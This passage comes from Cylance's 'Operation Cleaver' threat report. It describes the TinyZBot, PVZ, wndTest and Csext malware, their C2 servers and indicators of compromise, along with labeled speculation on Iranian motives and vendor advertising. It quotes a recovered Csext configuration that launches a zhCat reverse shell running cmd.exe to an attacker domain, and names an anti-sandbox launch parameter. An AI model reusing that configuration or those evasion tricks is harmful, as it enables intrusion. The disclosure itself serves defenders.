new Binder_1 instance, which contains one of the TinyZBot instances compiled that day. The legitimate application included in this binder is called Easy_resume_creator and is a legitimate application named EasyR\xc3\xa9sum\xc3\xa9CreatorPro. This version targeted a major Saudi Arabian oil company. From August 23 to August 26, 2014, new versions of TinyZBot were compiled with the AppUsageIds targeting major oil and gas companies in Qatar and Kuwait, Ministries of Foreign Affairs in the Persian Gulf, and a major airline holding company in UAE. These versions of TinyZBot moved towards a more modular architecture where each component was in its own .NET assembly. This was presumably done to limit antivirus detection of each individual file as well as allow for dynamic updating of specific modules. All of these were included in their own Binder_1 instance, which also dropped Easy_resume_creator. OPERATION CLEAVER 54 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 History (cont.) There also seem to be improved software engineering practices in many locations. FTP upload support was added, with hardcoded credentials of ano:1. This FTP upload functionality points to the command and control server, and is invoked by a command in the SOAP command and control channel. These versions have the capability to install as a service. On August 25, 2014, the version compiled on August 18 was submitted to a popular virus engine website in a ZIP archive located at http://dl.doosan-job(dot)com/cv/ Easy_Resume_Creator-v2.0.zip. This indicates that TinyZBot is not only being installed while impersonating a r\xc3\xa9sum\xc3\xa9 creation suite, but is also impersonating potential employers when distributed. On September 9, 2014, a ZIP file containing TinyZBot and a configuration targeting a major US university with its AppUsageId was created. This was discovered on an anonymous FTP server in the same IP range as dl.doosan-job(dot)com along with other malware. From September 11 through September 17, 2014, some TinyZBot components were compiled, along with a new dropper. This dropper impersonated a tool to submit a r\xc3\xa9sum\xc3\xa9 to Teledyne. When executed, the user is prompted to enter personal information, and at the end is given a button to submit the r\xc3\xa9sum\xc3\xa9 to Teledyne, although nothing is actually submitted. While the user enters this information, their machine is infected with TinyZBot. The AppUsageIds for these versions target a major US-based university as well as an Israeli aerospace company. These versions began to include a new method of installing as a service. The service runs with the name Network Connectivity Manager. Interesting Notes TinyZBot, as well as some other tools (Csext, Net Crawler) initially would not run without a command line parameter set. This was likely to avoid detonation-based detection engines. This command line parameter was opensesemi which is often stored in the application\xe2\x80\x99s code in an obfuscated manner. The binders and droppers for TinyZBot provided this command line argument and others when executing. TinyZBot uses a dynamic mutex. This was accomplished by combining a static preset prefix with the active process ID. This allowed supplemental tools to keep TinyZBot running by enumerating every process and checking if the process ID and mutex prefix existed. If no mutex and process pair was located, another TinyZBot instance would be started. #OPCLEAVER 55 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2ff 0476 f6f 4 Command and Control Servers \xe2\x80\xa2 88.150.214.168, United Kingdom, microsoftactiveservices(dot)com \xe2\x80\xa2 95.211.241.249, Amsterdam, Noord-Holland, Netherlands \xe2\x80\xa2 88.150.214.166, United Kingdom \xe2\x80\xa2 173.192.144.68, Seattle, Washington, USA \xe2\x80\xa2 188.227.180.213, United Kingdom \xe2\x80\xa2 192.111.145.197, Rochester, New York, USA Backdoors Multiple backdoors were used by this organization. These are scripts or applications that allowed for command or code execution outside of the victim network. Many of their backdoors were web applications, added to web servers, so commands can be executed from a browser or client able to communicate with them. This group includes the results of the Shell Creator mentioned in the Attribution section, as well as ASPX backdoors used by Nesha. A PHP shell was also observed, which also included attribution to Nesha in its hashed password. An ASPX backdoor named Zh0uSh311 was located on live servers as well as recovered from a staging server. This backdoor does not require authentication, and its use appears to be straightforward. Its functionality breaks down into three fairly standard components: SQL queries, executing commands, and uploading files. Figure 24: The ASPX backdoor named \xe2\x80\x9cZh0uSh3ll\xe2\x80\x9d, allowing SQL queries. OPERATION CLEAVER 56 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 This organization utilized backdoors which masqueraded as varying versions of Notepad. They replace the existing Notepad.exe on the infected machine, and when run they call out to a remote server and execute any shell code returned by the remote server. There will be a detailed analysis of these backdoors posted to Cylance\xe2\x80\x99s blog in the future. PVZ PVZ is a name for a set of executables used together to create a botnet. The name PVZ was assigned by us as this is one of the few tools this organization has not named themselves. Figure 25: The ASPX backdoor named \xe2\x80\x9cZh0uSh3ll\xe2\x80\x9d, allowing file #OPCLEAVER 57 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2ff 0476 f6f 4 PVZ (cont.) The components are as follows: \xe2\x80\xa2 PVZ-In \xe2\x80\xa2 PVZ-Out \xe2\x80\xa2 Syn Flooder \xe2\x80\xa2 LoggerModule \xe2\x80\xa2 XYNTService \xe2\x80\xa2 Jasus XYNTService was not developed by the Cleaver team, but instead is a publicly available project which executes an executable as a service. PVZ-In The purpose of PVZ-In is to communicate with a command and control server. Communication is primarily unidirectional, as little information is provided from the bot to its command and control server. The known command and control server is located at http://kundenpflege. menrad(dot)de/js/jquery/default.aspx and the command and control protocol only uses HTTP. The commands as well as infected computer information are transferred in the Content- Disposition HTTP header, making the traffic easy to pass over as benign. When a command is received from the server, the results are stored in a central location on disk that the PVZ tools utilize. Command functionality is limited to executing supplied commands, downloading and executing executables as well as self-updating. The debug file path for PVZ-In is: C:\\Users\\parviz\\documents\\visual studio 2010\\Projects\\BotManager\\ Release\\BotManager.pdb PVZ-In has been observed using the file name ossisvc.exe. PVZ-Out PVZ-Out is the other half of the command and control channel, primarily uploading results of commands and keystroke logging data to a remote server. The known command and control server for PVZ-Out is located at http://www.gesunddurchsjahr(dot)de/tor/default.aspx. Much like PVZ-In, this command and control channel communicates with the Content-Disposition HTTP header, but for file data, POST data is supplied. OPERATION CLEAVER 58 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 Data uploaded is often compressed, which can make it more difficult to detect the exfiltration of sensitive information. The debug file path for PVZ-Out is: C:\\Users\\Parviz\\documents\\visual studio 2010\\Projects\\SendModule\\ Release\\SendModule.pdb PVZ-Out has been observed with the file name osppsvc.exe. SYN Flooder SYN Flooder is a simple network based denial of service tool. It is a command line utility capable of being invoked by PVZ-In. Targeting information is supplied via command line parameters. The debug file path for SYN Flooder is: C:\\Users\\parviz\\Documents\\Visual Studio 2010\\Projects\\socket-test\\ Release\\socket-test.pdb SYN Flooder has been observed using the name ossysvc.exe. Logger Module Logger Module observes the user\xe2\x80\x99s actions and records them to a file. The recorded actions include mouse clicks, active windows, keypresses, as well as clipboard data. The resulting log is written out to a location where PVZ-Out can exfiltrate it to its command and control server. Logger Module has been observed using the name ospcsvc.exe. The following command and control servers for Logger Module have been observed: 212.87.154.14, Baden-Wurttemberg, Germany, kundenpflege.menrad(dot)de 212.87.154.12, Baden-Wurttemberg, Germany, www.gesunddurchsjahr(dot)de wndTest WndTest is the evolution of the PVZ tool chain into a single executable. The tool chain is minimized down to a command and control communications, keystroke logging, and clipboard monitoring. The command and control still supports upgrading, downloading, and executing of applications, as well as executing batch scripts. WndTest installs as a service and has been observed attempting to impersonate Adobe Report Service. WndTest starts using PHP servers for its command and control server, some of which are listed as defaced sites. #OPCLEAVER 59 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2ff 0476 f6f 4 We have seen wndTest communicate with the following servers: \xe2\x80\xa2 209.208.97.44, Orlando, Florida, USA, www.lat(dot)am \xe2\x80\xa2 23.238.17.181, Tulsa, Oklahoma, USA, regulatorfix(dot)com \xe2\x80\xa2 209.208.97.44, Orlando, Florida, USA, www.asiess(dot)com \xe2\x80\xa2 198.50.100.210, Quebec, Canada, halon(dot)com.br \xe2\x80\xa2 207.182.142.68, Columbus, Ohio, USA \xe2\x80\xa2 95.211.191.247, Amsterdam, Noord-Holland, Netherlands Csext Csext is a backdoor application developed in C# which runs as a service. Its primary functionality is based on commands supplied by its configuration file. The configuration file is able to store specific commands, which are intended to run at particular times. A recovered configuration is as follows: domain1=srv01.microsoftwindowsupdate(dot)net,check.html,3 %% {0}\\{zhname}$$ -h -x -i {domain1} -p 443 -e c:\\windows\\system32\\cmd. exe ,taskkill.exe$$/F /PID {pid},00:29,00:35 %% ## This configuration executes zhCat to connect back to srv01.microsoftwindowsupdate(dot)net (a deceptive domain owned by this group with falsified Whois data attributing to Microsoft Investor Relations) with XORed communication using the HTTP protocol on TCP port 443. This zhCat instance is running cmd.exe, effectively making it a reverse connecting shell. This command runs at 00:29 in the morning, and is killed by taskkill at 00:35. This gives the attackers a predictable method to regain access to a compromised network if they ever lose access. Csext also has email functionality similar to TinyZBot. This email functionality is used to exfiltrate the results of commands from the command file which can also include requests like gathering user information. We have seen Csext configured to communicate with the following servers: \xe2\x80\xa2 78.47.102.90, Germany, srv01.microsoftwindowsupdate(dot)net \xe2\x80\xa2 174.36.195.158, Washington D.C, USA, srv01.microsoftupdateserver(dot) net OPERATION CLEAVER 60 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 MITIGATION COVER TTP COVER HERE MITIGATION #OPCLEAVER 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 #OPCLEAVER 61 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2ff 0476 f6f 4 MITIGATION If after reviewing the Indicators of Compromise (IOC) listed in Appendix A, you believe your organization to be a victim of Operation Cleaver, we recommend you consider the following course of action: 1. If inside the United States, contact the Federal Bureau of Investigation (FBI) via either your local FBI team or FBI CYWATCH at 1-855-292-3937 or cywatch@ic.fbi.gov. 2. If outside the United States, contact your local, district, state or federal law enforcement authorities. 3. If you have visibility into the attacks on your company and the tools and expertise to track them down, leverage the IOCs in Appendix A to identify their presence in your network, prevent them from expanding the scope of the compromise, and remove their access immediately. 4. If you do NOT have visibility into the attacks, need help identifying an existing successful compromise in your organization, or more importantly wish to prevent this attack or attacks similar to Operation Cleaver, please contact your security provider. 5. If you wish to contact Cylance for additional details not available in this report, please email opcleaver@cylance.com. 6. If you would like to learn more about Cylance products and professional services, or discuss how Cylance can mitigate Operation Cleaver\xe2\x80\x99s impact to your organization, please contact us directly. +1 (877) 973 - 3336 opcleaver@cylance.com www.cylance.com OPERATION CLEAVER 62 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 SPECULATION COVER TTP COVER HERE SPECULATION #OPCLEAVER 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 #OPCLEAVER 63 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2ff 0476 f6f 4 SPECULATION: THE WHY Iran in 2014 can probably be best described as galvanizing. They have long been an \xe2\x80\x9cenemy\xe2\x80\x9d of the west, and the United States in particular, but today\xe2\x80\x99s headlines include a variety of topics from nuclear talks to human rights to terrorism to cyber hacking. Iran continues to be extremely active on the global stage \xe2\x80\x93 and thereby on the radar of every superpower.10 Iran\xe2\x80\x99s cyber sophistication has grown rapidly since the dawn of Stuxnet and they have used hard dollars combined with national pride to help build their cyber army. Few doubt their commitment as a government and nation state to funding and recruiting cyber warriors to infiltrate and damage their enemies. And it has been commonly postulated that almost all activity since 2010 coming out of Iran is associated with retaliation for Stuxnet/Duqu/Flame, which seems natural given the severity of the impact. But they don\xe2\x80\x99t need Stuxnet as motivation to want to hack the world. They have long desired power on the political stage, in particular in the fight for nuclear power autonomy. With the deadlines around the Iranian nuclear discussions pushed to 2015, the attacks may be tied to negotiating power when discussing a pact with the nuclear superpowers of United States, Britain, France, Germany, Russia and China. The inner workings of the Iranian government remain largely a mystery to the western world. However, Iran\xe2\x80\x99s control over its people and the private businesses birthed inside has been well reported. In a 2014 Reuters article, the reporters detail how the secret Iranian organization called \xe2\x80\x9cSetad Ejraiye Farmane Hazrate Emam\xe2\x80\x9d has become one of the most powerful organizations in the country, capable of taking over properties and businesses, buying controlling interests in numerous sectors including finance, oil, telecommunications and many others totaling in upwards of $95B.11 Even the US Treasury has documented an extensive fronting of companies in its report of Execution of Imam Khomeini\xe2\x80\x99s Order (EIKO), which through its two main subsidiaries controls 37 private businesses that are purely front companies for the Iranian government.12 The history of Iran controlling the usage of the Internet and the very Internet on-ramps into Iran is well known13, 14. They have controlled much of the country\xe2\x80\x99s Internet access to date and have taken over controlling interests in those companies to carry out their work. Given Operation Cleaver\xe2\x80\x99s frequent spin-up and take-down of large IP blocks inside the AFRANET IP space inside Iran, and Iran\xe2\x80\x99s well recorded investment in cyber warfare14 leads us to one simple conclusion: Iran is extremely active in the world of hacking. OPERATION CLEAVER 64 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 Speculation: The Why (cont.) Involvement with North Korean Operation Cleaver\xe2\x80\x99s intense focus on critical infrastructure companies, especially in South Korea, hints at information sharing or joint operations with Iran\xe2\x80\x99s partner, North Korea. In September, 2012, Iran signed an extensive agreement for technology cooperation agreement with North Korea, which allows for collaboration on a variety of efforts including IT and security.6 Cyber Moving to Physical Operation Cleaver\xe2\x80\x99s carefully selected targets like the oil and gas industry, energy and utility companies, as well as airlines and airports, indicates Iran\xe2\x80\x99s desire to gain deep access into the world\xe2\x80\x99s most critical environments. The end goal of this operation is not known at this time. University Recruitment University student recruitment was hinted at within Operation Cleaver and is consistent with Iran\xe2\x80\x99s reported history of active warrior recruitment in the educational space.15 Overall, there are many reasons that Iran may be pursuing the targets they did in Operation Cleaver. While we may never truly know, it is important to consider all the above and more when trying to understand the why. #OPCLEAVER CONCLUSION 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 OPERATION CLEAVER 66 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 CONCLUSION After tracking the Operation Cleaver team for over two years, we\xe2\x80\x99re led to the inexorable conclusion: the government of Iran, and particularly the Islamic Revolutionary Guard Corps (IRGC), is backing numerous groups and front entities to attack the world\xe2\x80\x99s critical infrastructure. As security experts in Critical Infrastructure and Key Resources (CIKR), Industrial Control Systems (ICS), Supervisory Control and Data Acquisition (SCADA) systems, Building Management Systems (BMS), embedded systems and fixed-function systems, we know how easy they are to hack. We have worked with countless customers and vendors throughout the years to notify them of vulnerabilities, assist with remediatation efforts, and help mitigate threats to their environments. Unfortunately, many critical infrastructure organizations are unable to secure their complex envirnoments against modern attacks. They fall victim to the \xe2\x80\x9cglue flu\xe2\x80\x9d, a malaise of feeling stuck, not wanting to change the status quo for fear they will find problems that they have no idea how to prevent. This \xe2\x80\x9csecurity anaphylaxis\xe2\x80\x9d spells real disaster. If Operation Cleaver doesn\xe2\x80\x99t get the world to wake up to what is happening in the silent world of cyber, then perhaps nothing will. Prevention is everything and we should never give up until it\xe2\x80\x99s achieved. Challenge your trusted advisors. Challenge your security vendors. Demand better technology and services to detect, respond, but most importantly PREVENT not just contemporary attacks, but future exotic attacks that have yet to be imagined. That is what truly disruptive and innovative technology is. Don\xe2\x80\x99t settle for anything less. We hope that by exposing the Operation Cleaver team to the world, current global critical infrastructure victims can be notified, and prevent future victimization from suffering the consequences of \xe2\x80\x9cstatus quo\xe2\x80\x9d security. Unlike United Flight 811, perhaps we can prevent the next disaster. DEFENDERS, NEVER GIVE UP! #OPCLEAVER 67 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2ff 0476 f6f 4 REFERENCES [1] Aboard Flight 811: Passengers\xe2\x80\x99 Routine Dissolves Into Terror - February 1989 http://www.nytimes.com/1989/02/26/us/aboard-flight-811-passengers-routine-dissolves-into-terror.html [2] \xe2\x80\x9cForget China: Iran\xe2\x80\x99s Hackers Are American\xe2\x80\x99s Newest Cyber Threat\xe2\x80\x9d - February 2014 http://complex.foreignpolicy.com/posts/2014/02/18/forget_china_iran_s_hackers_are_america_s_newest_cyber_ threat [3] \xe2\x80\x9cDevelopments in Iranian Cyber Warfare 2013-2014\xe2\x80\x9d - August 2014 http://www.inss.org.il/uploadImages/systemFiles/SiboniKronenfeld.pdf [4] \xe2\x80\x9cIran ups cyber attacks on Israeli computers: Netanyahu\xe2\x80\x9d - June 2013 http://uk.reuters.com/article/2013/06/09/us-israel-iran-cyber-idUKBRE95808H20130609 [5] \xe2\x80\x9cIranians hacked Navy network for four months? Not a surprise.\xe2\x80\x9d - February 2014 http://arstechnica.com/information-technology/2014/02/iranians-hacked-navy-network-for-4-months-not-a-surprise/ [6] \xe2\x80\x9cIran and North Korea Sign Technology Treaty to Combat Hostile Malware\xe2\x80\x9d - September 2012 http://www.v3.co.uk/v3-uk/news/2202493/iran-and-north-korea-sign-technology-treaty-to-combat-hostile-malware# [7] \xe2\x80\x9cIran\xe2\x80\x99s Paramilitary Militia Is Recruiting Hackers\xe2\x80\x9d - January 2011 http://www.forbes.com/sites/jeffreycarr/2011/01/12/irans-paramilitary-militia-is-recruiting-hackers/ [8] \xe2\x80\x9cThe Iranian Nuclear Weapon\xe2\x80\x9d - January 2014 http://webcache.googleusercontent.com/search?q=cache:eJbMz7vynpQJ:iranredline.org/index. php%3Fid%3D22+&cd=1&hl=en&ct=clnk&gl=us [9] \xe2\x80\x9cHPSR Threat Intelligence Briefing Episode 11, February 2014\xe2\x80\x9d - February 2014 http://www8.hp.com/h20195/v2/getpdf.aspx/4AA5-1589ENW.pdf?ver=1.0 [10] \xe2\x80\x9cIntel boss\xe2\x80\x99 warning on cyber attacks no joke, say experts\xe2\x80\x9d - November 2014 http://www.foxnews.com/world/2014/11/23/intel-boss-warning-on-cyber-attacks-no-joke-say-experts/ [11] \xe2\x80\x9cKhamenei controls massive financial empire built on property seizures\xe2\x80\x9d - November 2013 http://www.reuters.com/investigates/iran/#article/part1 [12] \xe2\x80\x9cTreasury Targets Assets of Iranian Leadership\xe2\x80\x9d - June 2013 http://www.treasury.gov/press-center/press-releases/Pages/jl1968.aspx [13] \xe2\x80\x9cInternet Censorship in Iran\xe2\x80\x9d http://en.wikipedia.org/wiki/Internet_censorship_in_Iran [14] \xe2\x80\x9cIranian Internet - Fact and Faction\xe2\x80\x9d http://surveillance.rsf.org/en/iran/ [15] \xe2\x80\x9cIran readying hacker attacks on U.S. infrastructure, specialists say\xe2\x80\x9d - April 2012 http://www.washingtontimes.com/news/2012/apr/25/iran-readying-hacker-attacks-us-infrastructure-spe/?page=all OPERATION CLEAVER 68 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 ABOUT CYLANCE In the face of growing and evolving threats, traditional cyber protection technologies are now widely considered inadequate. The only way to regain the upper hand against a new generation of attackers, is to embrace something entirely new. Something that \xe2\x80\x9cthinks\xe2\x80\x9d like an attacker. Something that doesn\xe2\x80\x99t rely on a trust model or care about hash lookups. Something with a brain. \xe2\x80\x9cThe world has combated cyber threats by doing the same thing over and over again ... it\xe2\x80\x99s the definition of insanity!\xe2\x80\x9d Jeff Moss - Co-Chair of the DHS Community Resiliency Task Force & Founder of BlackHat and DEFCON security conferences Cylance has eschewed the old foundations that existing cybersecurity products are built upon. Instead, we\xe2\x80\x99ve based our approach on mathematics, machine learning, and data science. This algorithmic approach has been proven to detect \xe2\x80\x93 and stop \xe2\x80\x93 exponentially more modern threats. Leveraging algorithmic risk modeling, CylancePROTECT protects endpoints from everyday viruses, worms, trojans, and spyware, but unlike other security products, CylancePROTECT offers true future-proof protection against the most malicious threats in the world. Advanced Persistent Threats (APT), 0-days, and exotic exploitation techniques are easily detected and halted with little-to-no impact on the end-user. Existing reactive solutions rely on a constant stream of signature updates for threat detection, which is not only costly and inconvenient, but also requires \xe2\x80\x9csacrificial lambs\xe2\x80\x9d. Only after a previously unseen threat has inflicted damage can the rest of the industry begin to detect it. CylancePROTECT doesn\xe2\x80\x99t require constant updates or even a network connection to protect against so-called \xe2\x80\x9cpreviously undetectable\xe2\x80\x9d threats. By identifying and defusing attacks in near real time, before the attack can execute, we can finally do away with the need for a \xe2\x80\x9cpatient zero\xe2\x80\x9d. As Richard Stiennon, Chief Research Analyst at IT-Harvest, put it, \xe2\x80\x9cMany vendors are trying to solve the endpoint problem, yet Cylance is the only one using the power of math to stop malware and with more effectiveness and efficiency than current solutions\xe2\x80\x9d. Interested in seeing what CylancePROTECT can do for your organization? Contact us! Cylance is one of the fastest growing cybersecurity technology firms in the US. Cylance\xe2\x80\x99s flagship product CylancePROTECT has been adopted by Fortune 500 companies and government agencies across the globe. Cylance was founded by 27-year security industry luminary, Stuart McClure, former Global CTO of McAfee, original founder of Foundstone, and lead author of the international best-selling book Hacking Exposed. In building Cylance, Stuart brought together the best scientific and executive minds from the likes of Cisco, Sourcefire, Google and McAfee. The Cylance board of advisors includes former high-ranking officials from the DHS, the FBI, CIA, and executive titans of business. #OPCLEAVER 69 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2ff 0476 f6f 4 CYLANCE PRODUCTS CylancePROTECT is the only next generation endpoint security product that applies math to mute existing and future malware, viruses, worms, trojans, bots, APTs, 0-days, exploits, adware, spyware and hacking tools \xe2\x80\x93 without needing any updates or even a connection to the Internet. The technology is founded on the principle that to fix the industry, you must start from scratch with a way as yet unseen. CylancePROTECT does not rely on signatures of any sort (blacklist or whitelist), behavioral analysis using IOCs, sandboxing analysis, heuristics, micro-virtualization, or dynamic detonation \xe2\x80\x93 to detect and prevent malicious files from executing on a target endpoint. While every other endpoint security product must collect a sample, analyze, and write a signature to detect it, CylancePROTECT can detect malware before it executes by statically analyzing features found in the binary itself. Features and Benefits of CylancePROTECT: \xe2\x80\xa2 Near real time detection of malicious files, even if they\xe2\x80\x99ve never been seen in the wild. \xe2\x80\xa2 Can be used to augment existing endpoint security or be deployed as a complete replacement. \xe2\x80\xa2 Does not require any signature updates or connection to the cloud. \xe2\x80\xa2 An easy-to-use web management console with intuitive workflows. \xe2\x80\xa2 Low-impact endpoint agent. For a demo of CylancePROTECT, contact a Cylance expert today! Figure 26: Cylance products detect and stop all the malware used in Operation Cleaver, even though the vast majority of the samples are completely missed by the antivirus industry as of this report\xe2\x80\x99s publication. OPERATION CLEAVER 70 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 CYLANCE SERVICES Cylance\xe2\x80\x99s Professional Services team is available to assist companies affected by this campaign. Cylance is providing consulting to companies that may have been targeted by these advanced threat actors. Cylance will perform initial triage in order to determine the extent to which your company has been affected by this campaign and work towards establishing a containment strategy. Cylance has two tailored offerings for clients affected by this campaign. The first one includes ICS in our incident response since many companies affected are in the Critical Infrastructure and Key Resources (CIKR) vertical. The second offering\xe2\x80\x99s focus is to deploy our proprietary tools and methodologies to detect and mitigate the threats posed by Operation Cleaver. Option 1: ICS Incident Response & APT Detection and Mitigation Option 2: Detection, Remediation, & Mitigation For more information on how the Cylance Professional Services team can assess and respond to attacks like the ones obseved in Operation Cleaver, contact sales@cylance.com today. CUSTOM SERVICES FORENSIC INVESTIGATIONS INCIDENT RESPONSE PENETRATION TESTING COMPROMISE ASSESSMENTS Uncover previously undiscovered breach and damage. Stop the threat, mitigate risk, and remediate. Check the integrity of your environment and infrastructure. Dig into who, what, where, and when a compromise occurred. Get expert help that addresses YOUR security needs. #OPCLEAVER 71 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2ff 0476 f6f 4 ACKNOWLEDGMENTS Brian Wallace Brian is a Sr. Security Researcher for Cylance who joined shortly after the company was established. He is best known for his avid botnet research (often going by \xe2\x80\x9cbotnet_hunter\xe2\x80\x9d) and for his novel malware analysis in the A Study in Bots blog series hosted by Cylance. Brian has been a dedicated open-source developer as well as an advocate for public and private anti-botnet operations. Brian actively develops techniques to combat cyber oppositions in positions where resources and leverage are in too limited of supply for conventional means. These techniques, cultivated by Stuart McClure, are the Art of Deterrence. In a previous investigation, Art of Deterrence techniques were successfully used to divert Indonesian hackers motivated by monetary gain away from their highest yielding target group. Brian\xe2\x80\x99s botnet research covers a wide range of topics, from using graph analysis to estimate the amount of ransom that has been paid to a ransomware operator, to utilizing IPv4 scanning techniques to identify and take down point of sale malware panels. Stuart McClure Stuart is founder, CEO/President and Chairman of Cylance. Widely recognized for his extensive and in-depth knowledge of security products, Stuart McClure is considered one of the industry\xe2\x80\x99s leading authorities in information security today. A well-published and acclaimed security visionary with currently eleven books in print, McClure is the originating founder of the Hacking Exposed series of books, the most successful security book ever written. From his work, he founded Foundstone in October of 1999 which sold to McAfee in 2004. McClure brings over two decades of technology and executive leadership with profound technical, operational, and financial experience. Besides Foundstone, Stuart held leadership positions at InfoWorld, Ernst & Young, Kaiser Permanente and a number of government agencies. At McAfee, McClure held numerous positions including SVP/General Manager for the Security Management BU as well as EVP/Global Chief Technology Officer responsible for almost $3B worth of revenues. Today, McClure is CEO of Cylance, a disruptive and innovative startup applying math to the problem of security. Cylance products such as CylancePROTECT prevent the most advanced attacks in the world without signatures or sandboxing in realtime on the endpoint. Cylance Services offer highly specialized security services such as incident response, forensics, compromise assessments and advanced penetration assessments for global critical infrastructure. Cylance Team Cylance employees work passionately and tirelessly every day to achieve one goal: Protect the world from cyber attacks. And with their efforts in tracking Operation Cleaver, they have achieved that goal. Our endless thanks to all the Cylancers who contributed to this report. OPERATION CLEAVER 72 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 THE OPERATION CLEAVER LOGO The Operation Cleaver logo, created by Cylance specifically for this report, was inspired by the infamous logo used by the Army of the Guardians of the Islamic Revolution, also known in the west as the Iranian Revolutionary Guard Corps (IRGC). Due to the close connection between the members tracked in this report and the IRGC, it was only fitting to replicate the look and feel of the IRGC\xe2\x80\x99s iconography as the anchor for this document\xe2\x80\x99s branding. Army of the Guardians of the Islamic Republic (IRGC) The striking visual elements that make up the logo of the IRGC have very specific meanings: \xe2\x80\xa2 The clenched fist holding a rifle, most likely an AK-47, represents armed resistance. \xe2\x80\xa2 The globe symbolizes the IRGC\xe2\x80\x99s worldwide ambitions. \xe2\x80\xa2 The book, from which the clenched first emanates, represents the Qur\xe2\x80\x99an, connecting the religious ideals on which the group was founded to the armed struggle. \xe2\x80\xa2 The plants, possibly wheat, represent prosperity. \xe2\x80\xa2 The name of the group in Persian, the year in which it was founded and a passage from the Qur\xe2\x80\x99an (8:60) \xe2\x80\x98And make ready against them all you can of power\xe2\x80\x99, are represented in text. 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 Operation Cleaver Several of the visual elements present in the IRGC logo have been carried over to the Operation Cleaver logo including: \xe2\x80\xa2 A clenched fist, this time holding a cleaver, represents the group\xe2\x80\x99s likely connection with the IRGC as well as armed resistence in general. \xe2\x80\xa2 The globe in the background represents Operation Cleaver\xe2\x80\x99s worldwide reach. \xe2\x80\xa2 An ethernet cable connected to the clenched first represents the nature of these attacks (cyber as opposed to traditional warfare). \xe2\x80\xa2 The hex string translates to \xe2\x80\x9cThink Evil, Do Good\xe2\x80\x9d, a mantra our research team lives by. #OPCLEAVER APPENDIX A: INDICATORS OF COMPROMISE 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 OPERATION CLEAVER 74 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 Indicators of Compromise (IOC) This Appendix details the IOCs discovered in the investigation of Operation Cleaver. CylancePROTECT prevents the malware used in Operation Cleaver from ever executing. Domains doosan-job(dot)com downloadsservers(dot)com drivercenterupdate(dot)com easyresumecreatorpro(dot)com googleproductupdate(dot)com googleproductupdate(dot)net kundenpflege.menrad(dot)de microsoftactiveservices(dot)com microsoftmiddleast(dot)com microsoftonlineupdates(dot)com microsoftserverupdate(dot)com microsoftupdateserver(dot)net microsoftwindowsresources(dot)com microsoftwindowsupdate(dot)net northropgrumman(dot)net teledyne-jobs(dot)com windowscentralupdate(dot)com windowssecurityupdate(dot)com windowsserverupdate(dot)com windowsupdateserver(dot)com www.gesunddurchsjahr(dot)de Email Addresses Used for Domain Registration davejsmith200(at)outlook.com salman.ghazikhani(at)outlook.com btr.8624(at)yahoo.com ghanbarianco(at)gmail.com azlinux73(at)gmail.com domain(at)netafraz.com tarh.andishan(at)yahoo.com ahmadi(at)odeconline.com kafe0(at)yahoo.com dg_co(at)yahoo.com zahiry_alireza(at)yahoo.com zahiry.alireza(at)gmail.com #OPCLEAVER 75 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2ff 0476 f6f 4 Email Addresses Used for Exfiltration testmail_00001(at)yahoo.com TerafficAnalyzer(at)yahoo.com dyanachear(at)beyondsys.com IP Addresses 50.23.164.161 64.120.128.154 64.120.208.74 64.120.208.75 64.120.208.76 64.120.208.78 64.120.208.154 66.96.252.198 78.109.194.114 80.243.182.149 87.98.167.71 87.98.167.85 87.98.167.141 88.150.214.162 88.150.214.166 88.150.214.168 88.150.214.170 Mutexes ZSC1 Adobe Report Service Bmgr Dynamic Mutexes These mutexes are used with the process ID of the malware as a suffix: demdaramdidam ILoveThisMutex 95.211.191.225 95.211.191.247 95.211.241.249 95.211.241.251 108.175.152.230 108.175.153.158 159.253.144.209 173.192.144.68 174.36.195.158 184.82.158.18 184.82.181.48 188.227.180.213 192.111.145.197 203.150.224.249 207.182.142.68 212.87.154.12 212.87.154.14 OPERATION CLEAVER 76 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 Installed Services Names COM+ System Extentions COM__System_Extentions Network Connectivity Manager Service1 MsNetMonitor Pcapins scManagerSvc CredentialSync Adobe Report Service Samples (MD5) Listed below are both the MD5 and SHA-256 hashes for samples related to Operation Cleaver. 01606d42c64e4d15ea07d4e1fbd0c40d 0405adfc8739025ba88c746c8edebfb8 04fdf5b757764af8bc7ef88e0f8fe8c1 0512c5a8807e4fdeb662e61d81cd1645 0593352cadb2789c19c2660e02b2648b 08eabb6164b1b12307931e4f2d95f7c6 0900c3319e4c46ff9478e3e1fa9528a1 0acd8945bd162e5e7aa982cddbd8ecaa 0ad6a01a916f14fc24fa43e46813b3bb 0b2cbfa07fa9a090b35a3dfdb0ebad9d 0b80a8d2c56789b4bda9a56a53e7e2b1 0f4b526d8edf1d3d32c81a692c325733 10d019932fc43e9b39be709f8281203d 1223e93dd4a5ad0536c8232936cb35fe 144064951cceaf1bb81e8f215de76101 14a80287490f3a68d99c0f518b246fd2 17d1f25185b31044eb89a99d50d36a26 18942a44d2b5f2bbf54e2c18ac293915 18efd3f66d23c5c555e128a19de63667 